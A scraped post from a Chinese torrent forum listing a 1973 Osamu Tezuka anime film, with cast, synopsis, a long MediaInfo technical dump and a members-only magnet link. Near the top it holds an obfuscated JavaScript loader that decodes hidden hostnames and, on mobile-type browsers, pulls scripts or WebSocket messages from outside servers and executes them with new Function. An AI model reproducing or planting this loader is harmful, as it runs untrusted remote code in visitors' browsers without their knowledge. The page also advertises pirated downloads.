悲伤的贝拉多娜[简繁字幕].Belladonna.of.Sadness.1973.BluRay.1080p.DTS-HD.MA.2.0.x265.10bit-迅雷下载 11.72GB

版主小s 2月前 484

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译 名 悲伤的贝拉多娜 / Belladonna of Sadness / Kanashimi no Beradona

◎片 名 哀しみのベラドンナ

◎年 代 1973

◎产 地 日本

◎类 别 剧情 / 动画 / 奇幻

◎语 言 日语

◎上映日期 1973-06-30(日本)

◎IMDb评分 7.4/10 from 4411 users

◎IMDb链接 https://www.imdb.com/title/tt0071203

◎豆瓣评分 8.9/10 from 6867 users

◎豆瓣链接 https://movie.douban.com/subject/1477317/

◎片 长 87分钟

◎导 演 山本映一 Eiichi Yamamoto / 手冢治虫 Osamu Tezuka

◎编 剧 手冢治虫 Osamu Tezuka

◎主 演 长山蓝子 Aiko Nagayama

仲代达矢 Tatsuya Nakadai

中山千夏 Chinatsu Nakayama

◎标 签 手塚治虫 | 日本 | 动画 | 日本动画 | 情色 | 1970s | 手塚治蟲 | 动漫

◎简 介

美丽的贝拉多娜于新婚之际被领主夺去贞洁,丈夫在她憔悴归来之后却无安慰,贝拉多娜哀怨的身体召唤出恶魔,给予她慰藉。不久战争爆发,镇中壮丁随领主出征,贝拉多娜在丈夫一蹶不振之后凭神秘的能力维持城堡的供应,招来领主夫人妒恨,终被收监。身形愈发庞大的黑色恶魔到来,带走贝拉多娜,用瘟疫吞噬了茫茫大地,贝拉多娜用自己的特异能力解救人民,领主却再一次加害于她……本片由手冢治虫的“虫制作室”出品,是制作室于70年左右推出的系列成人动画电影中最具现代风格的一部,曾经作为73年柏林电影节的正式竞赛作品。担任本片配乐的佐藤允彦是七十年代日本自由爵士运动的核心人物之一。

◎获奖情况

第23届柏林国际电影节(1973)

金熊奖 最佳影片(提名) 山本映一

  1. General

  2. Unique ID : 5729356084105473677926728983599903707 (0x44F6F106DF0C81B13AEF8C9E89BF3DB)

  3. Complete name : Belladonna.of.Sadness.1973.BluRay.1080p.DTS-HD.MA.2.0.x265.10bit-BeiTai.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 11.7 GiB

  7. Duration : 1 h 27 min

  8. Overall bit rate mode : Variable

  9. Overall bit rate : 19.2 Mb/s

  10. Encoded date : UTC 2021-07-05 06:15:16

  11. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  12. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@High

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 27 min

  20. Bit rate : 17.3 Mb/s

  21. Width : 1 420 pixels

  22. Height : 1 080 pixels

  23. Display aspect ratio : 4:3

  24. Frame rate mode : Constant

  25. Frame rate : 24.000 FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.469

  30. Stream size : 10.5 GiB (90%)

  31. Title : HEVC, [email protected]@High, 24/1.001 fps @ 17271 kbps

  32. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  33. Encoding settings : cpuid=533541111039 / frame-threads=4 / numa-pools=16 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1420x1080 / interlace=0 / total-frames=125730 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=5 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=40 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=20.5 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=80000 / vbv-bufsize=80000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.40 / pbratio=1.30 / aq-mode=2 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  34. Language : English

  35. Default : Yes

  36. Forced : No

  37. Color range : Limited

  38. Color primaries : BT.709

  39. Transfer characteristics : BT.709

  40. Matrix coefficients : BT.709


  41. Audio

  42. ID : 2

  43. Format : DTS XLL

  44. Format/Info : Digital Theater Systems

  45. Commercial name : DTS-HD Master Audio

  46. Codec ID : A_DTS

  47. Duration : 1 h 27 min

  48. Bit rate mode : Variable

  49. Bit rate : 1 800 kb/s

  50. Channel(s) : 2 channels

  51. Sampling rate : 48.0 kHz

  52. Frame rate : 93.750 FPS (512 SPF)

  53. Bit depth : 24 bits

  54. Compression mode : Lossless

  55. Stream size : 1.10 GiB (9%)

  56. Title : Japanese DTS-HD Master Audio 2.0 @ 1800 Kbps

  57. Language : Japanese

  58. Default : No

  59. Forced : No


  60. Text #1

  61. ID : 3

  62. Format : PGS

  63. Codec ID : S_HDMV/PGS

  64. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  65. Duration : 1 h 26 min

  66. Bit rate : 10.4 kb/s

  67. Count of elements : 990

  68. Stream size : 6.39 MiB (0%)

  69. Title : Eng/SUP

  70. Language : English

  71. Default : No

  72. Forced : No


  73. Text #2

  74. ID : 4

  75. Format : PGS

  76. Codec ID : S_HDMV/PGS

  77. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  78. Duration : 1 h 26 min

  79. Bit rate : 61.5 kb/s

  80. Count of elements : 4235

  81. Stream size : 37.9 MiB (0%)

  82. Title : Chs/SUP 简体

  83. Language : Chinese

  84. Default : Yes

  85. Forced : No


  86. Text #3

  87. ID : 5

  88. Format : PGS

  89. Codec ID : S_HDMV/PGS

  90. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  91. Duration : 1 h 26 min

  92. Bit rate : 62.7 kb/s

  93. Count of elements : 4235

  94. Stream size : 38.7 MiB (0%)

  95. Title : Cht/SUP 繁体

  96. Language : Chinese

  97. Default : No

  98. Forced : No


  99. Menu

  100. 00:00:00.000 : en:第 01 章

  101. 00:05:05.958 : en:第 02 章

  102. 00:09:12.833 : en:第 03 章

  103. 00:12:42.250 : en:第 04 章

  104. 00:19:41.208 : en:第 05 章

  105. 00:28:27.791 : en:第 06 章

  106. 00:36:11.166 : en:第 07 章

  107. 00:49:11.750 : en:第 08 章

  108. 00:53:29.250 : en:第 09 章

  109. 01:03:17.458 : en:第 10 章

  110. 01:13:03.625 : en:第 11 章

  111. 01:19:41.750 : en:第 12 章




此处一般会放置磁力链或电驴下载链接,不过此链接需要注册会员才能看到,点击“立即注册”
磁力链下载【磁力链接仅对注册会员开放,登陆后可见】

TAGS 奇幻 剧情 动画

上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回